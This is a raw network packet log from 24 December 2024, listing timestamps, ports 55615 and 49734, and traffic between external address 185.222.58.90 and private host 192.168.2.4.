Dec 24, 2024 09:07:24.214250088 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.214277029 CET	49734	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:24.214298010 CET	49734	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:24.214457035 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.214468002 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.214514017 CET	49734	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:24.214562893 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.214704990 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.214715958 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.214724064 CET	49734	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:24.214750051 CET	49734	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:24.214766979 CET	49734	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:24.214778900 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.214821100 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.214831114 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.214869022 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.214879036 CET	49734	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:24.214914083 CET	49734	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:24.214926004 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.214956045 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.214975119 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.215084076 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.215094090 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.215132952 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.215188026 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.215307951 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.215361118 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.215478897 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.215692043 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.215701103 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.215728998 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.215792894 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.215804100 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.215877056 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.215887070 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.215931892 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.215941906 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.216044903 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.216056108 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.216068983 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.216135979 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.216145039 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.216226101 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.216237068 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.216418028 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.216428995 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.216440916 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.216451883 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.216463089 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.216473103 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.216490030 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.216500044 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.216542006 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.216629028 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.216639042 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.216681004 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.216691017 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.216725111 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.216734886 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.216841936 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.216851950 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.216902971 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.216917038 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.216989040 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.216999054 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.217128992 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.217140913 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.217152119 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.217241049 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.217251062 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.217256069 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.217302084 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.217354059 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.217411995 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.217423916 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.217552900 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.217561960 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.217582941 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.217592001 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.217689037 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.217698097 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.217775106 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.217782974 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.217926979 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.217935085 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.217952013 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.218106985 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.218116999 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.218125105 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.218136072 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.218146086 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.218267918 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.218276978 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.218385935 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.218395948 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.218445063 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.218544960 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.218554020 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.218563080 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.218662977 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.218672991 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.218770981 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.218780041 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.218853951 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.218907118 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.218977928 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.218988895 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.219033003 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.219043016 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.219091892 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.219100952 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.219213009 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.219222069 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.219269037 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.219278097 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.219310045 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.219357967 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.219424009 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.219434023 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.219474077 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.219521999 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.219592094 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.219602108 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.219635963 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.219755888 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.219767094 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.219804049 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.219858885 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.219868898 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.219880104 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.219892025 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.219934940 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.219952106 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.220041037 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.220052004 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.220128059 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.220138073 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.220170975 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.220180988 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.220236063 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.220244884 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.220328093 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.220362902 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.220372915 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.220546961 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.220556974 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.220566988 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.220577955 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.220587969 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.220606089 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.220614910 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.220690012 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.220702887 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.220742941 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.220752954 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.220837116 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.220846891 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.220885992 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.220930099 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.221023083 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.221038103 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.221086025 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.221096039 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.221142054 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.221152067 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.221298933 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.221308947 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.221318007 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.221596956 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.280038118 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.280056000 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.280066967 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.280078888 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.280091047 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.280100107 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.280112028 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.282141924 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.328835964 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.328897953 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.328907967 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.328918934 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.329020023 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.329030991 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.329127073 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.329135895 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.329212904 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.329222918 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.329279900 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.329291105 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.329478025 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.329487085 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.329662085 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.329670906 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.329679966 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.329709053 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.329833031 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.329876900 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.329885960 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.329904079 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.330048084 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.330056906 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.330172062 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.330229998 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.330368996 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.330377102 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.330513954 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.330523014 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.330589056 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.330598116 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.330689907 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.330698013 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.330777884 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.330781937 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.330848932 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.330861092 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.330985069 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.330993891 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.331043959 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.331052065 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.331126928 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.331135988 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.331223965 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.331233025 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.331331968 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.331341028 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.331404924 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.331414938 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.331500053 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.331504107 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.331584930 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.331588984 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.331645012 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.331654072 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.331792116 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.331801891 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.331859112 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.331870079 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.331906080 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.331923008 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.332007885 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.332016945 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.332051039 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.332109928 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.332194090 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.332273006 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.332282066 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.332293987 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.332382917 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.332391977 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.332515001 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.332524061 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.332637072 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.332644939 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.332726002 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.332736015 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.332782030 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.332789898 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.332882881 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.332891941 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.332952023 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.333029985 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.333077908 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.333086014 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.333219051 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.333229065 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.333300114 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.333307981 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.333379984 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.333389044 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.333398104 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.333439112 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.333513021 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.333520889 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.333626986 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.333636045 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.333718061 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.333726883 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.333834887 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.333842993 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.333920956 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.333930016 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.334028959 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.334100008 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.334108114 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.334146976 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.334217072 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.334224939 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.334346056 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.334355116 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.334431887 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.334440947 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.334497929 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.334506035 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.334609985 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.334620953 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.334702015 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.334708929 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.334781885 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.334790945 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.334849119 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.334985971 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.334995031 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.335026026 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.335035086 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.335109949 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.335119009 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.335128069 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.335150003 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.335158110 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.335213900 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.335222006 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.335288048 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.335319996 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.335396051 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.335411072 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.335450888 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.335458994 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.335535049 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.335592031 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.335675955 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.335685015 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.335695982 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.335745096 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.335753918 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.335817099 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.335824966 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.335913897 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.335922956 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.335978985 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.335983038 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.336057901 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.336066008 CET	55615	49734	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:24.336152077 CET	55615	49734	185.222.58.90	192.168.2.4
